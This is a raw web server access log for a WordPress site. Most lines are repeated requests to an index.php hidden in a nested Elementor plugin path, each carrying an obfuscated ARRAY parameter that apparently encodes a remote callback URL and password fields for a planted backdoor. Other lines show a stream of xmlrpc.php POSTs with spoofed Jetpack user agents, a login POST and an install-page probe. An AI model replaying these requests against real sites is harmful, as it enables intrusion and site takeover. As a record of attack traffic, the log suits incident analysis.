77.68.25.176 - - [22/Sep/2026:07:32:26 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036353934362p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323334362q3937313636303732393632646233633030373738393637323764313837343434222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:07:32:47 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036353936372p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323336372q3732373361353661333466356539313564386338313431626362653034373334222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:07:33:08 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036353938382p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323338382q3061323932643834656439306438393332636632623535666137356261333138222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:07:33:29 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363030392p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323430392q6566633333376533323335313435633332353035356136316433356364643330222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:07:33:50 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363033302p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323433302q3333363635633036376135376266626636656166666537373664626232376331222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:07:34:11 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363035312p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323435312q3961646436636234623039373962346335303532356439363331626333326239222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:07:34:32 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363037322p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323437322q6139663163356234336335356562666133626533333330326164633637386132222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:07:34:53 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363039332p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323439332q3434613032306337313764373764383465616231343162323931356432346463222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:07:35:14 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363131342p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323531342q6433666662643036363132393766636330656338646136373532633934393066222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
77.68.25.176 - - [22/Sep/2026:07:35:35 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363133352p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323533352q3161313438626261643330393234663938653165636465326136626566636535222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:37:15 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com"
77.68.25.176 - - [22/Sep/2026:07:35:56 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363135362p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323535362q6331353064316562396362623463356236303164393935353638636333303864222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:37:25 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack/12.1; WordPress/6.1; http://site50465084.com"
202.21.114.114 - - [22/Sep/2026:07:37:35 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack/13.0; WordPress/6.2; http://site72028637.com"
77.68.25.176 - - [22/Sep/2026:07:36:17 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363137372p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323537372q3365343934386230316631646137653932333137326539343562383533373263222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:37:46 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com"
66.249.91.67 - - [22/Sep/2026:07:37:53 +0000] "GET /privacy-policy/ HTTP/1.1" 200 30711 "-" "PlayStore-Google"
66.249.91.67 - - [22/Sep/2026:07:37:55 +0000] "GET /privacy-policy/ HTTP/1.1" 200 30730 "-" "PlayStore-Google"
202.21.114.114 - - [22/Sep/2026:07:37:57 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "WordPress.com; https://wordpress.com"
66.249.91.69 - - [22/Sep/2026:07:37:57 +0000] "GET / HTTP/1.1" 200 24380 "https://localpubpassport.co.uk/privacy-policy/" "PlayStore-Google"
77.68.25.176 - - [22/Sep/2026:07:36:38 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363139382p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323539382q6362396532356439373735363439646435646563306162333532393337323038222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:38:07 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com"
202.21.114.114 - - [22/Sep/2026:07:38:18 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.1)"
77.68.25.176 - - [22/Sep/2026:07:36:59 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363231392p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323631392q3335666530393038363331663464666238343236636333323534373833333965222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:38:28 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.1)"
198.204.240.42 - - [22/Sep/2026:07:38:30 +0000] "GET / HTTP/1.1" 200 72083 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
198.204.240.42 - - [22/Sep/2026:07:38:31 +0000] "GET / HTTP/1.1" 200 94747 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.204.240.42 - - [22/Sep/2026:07:38:32 +0000] "GET /index.php?params=1 HTTP/1.1" 301 5042 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
198.204.240.42 - - [22/Sep/2026:07:38:32 +0000] "GET /?params=1 HTTP/1.1" 200 71989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
202.21.114.114 - - [22/Sep/2026:07:38:39 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "WordPress.com; https://wordpress.com"
77.68.25.176 - - [22/Sep/2026:07:37:20 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363234302p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323634302q6235323261323862666637386635316265646339633762323235666230373333222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:38:49 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com"
202.21.114.114 - - [22/Sep/2026:07:39:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "WordPress.com; https://wordpress.com"
77.68.25.176 - - [22/Sep/2026:07:37:41 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363236312p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323636312q6232316563343239373935343066336632373664616130636439633166383564222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:39:10 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "WordPress.com; https://wordpress.com"
202.21.114.114 - - [22/Sep/2026:07:39:21 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com"
77.68.25.176 - - [22/Sep/2026:07:38:02 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363238322p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323638322q6137373737363730363733306466313062613462333561323535663036383333222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:39:31 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
202.21.114.114 - - [22/Sep/2026:07:39:42 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "WordPress.com; https://wordpress.com"
77.68.25.176 - - [22/Sep/2026:07:38:23 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363330332p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323730332q6335346633623637613663306331313536623631663464613737356533626235222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:39:53 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
202.21.114.114 - - [22/Sep/2026:07:40:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com"
77.68.25.176 - - [22/Sep/2026:07:38:44 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363332342p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323732342q6232623734613630666163396234346262303535383039303239623264636633222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
102.90.109.1 - - [22/Sep/2026:07:40:10 +0000] "POST /wp-login.php HTTP/1.1" 302 5220 "https://localpubpassport.co.uk/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
202.21.114.114 - - [22/Sep/2026:07:40:14 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com"
202.21.114.114 - - [22/Sep/2026:07:40:24 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack/12.5; WordPress/6.1; http://site58160553.com"
77.68.25.176 - - [22/Sep/2026:07:39:05 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363334352p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323734352q6532356162653566653934643737626361386261316265346365643230386562222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:40:35 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com"
202.21.114.114 - - [22/Sep/2026:07:40:45 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "WordPress.com; https://wordpress.com"
77.68.25.176 - - [22/Sep/2026:07:39:26 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363336362p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323736362q6433343933653531616133643134613934306261343733366136343937663538222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:40:56 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack/13.0; WordPress/6.4; http://site57223539.com"
162.158.182.103 - - [22/Sep/2026:07:41:06 +0000] "GET /wp-admin/install.php?step=1 HTTP/1.1" 403 5807 "-" "http://localpubpassport.co.uk/wp-admin/install.php?step=1"
202.21.114.114 - - [22/Sep/2026:07:41:07 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "WordPress.com; https://wordpress.com"
77.68.25.176 - - [22/Sep/2026:07:39:47 +0000] "GET /wp-content/plugins/elementor/modules/element-manager/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313739303036363338372p2231223n22687474703n5p2s5p2s6p776n3133362r70616q6973742r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313739303036323738372q6633636335666261653831376231396361653135653137303134393236346633222p2232223n226430306430633965613362616662313632643334386462663866656163303162222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33312q35332q36392q37372q38352q3136227q HTTP/1.1" 200 5013 "-" "-"
202.21.114.114 - - [22/Sep/2026:07:41:17 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.4)"
202.21.114.114 - - [22/Sep/2026:07:41:28 +0000] "POST /xmlrpc.php HTTP/1.1" 200 5416 "-" "Jetpack by WordPress.com"
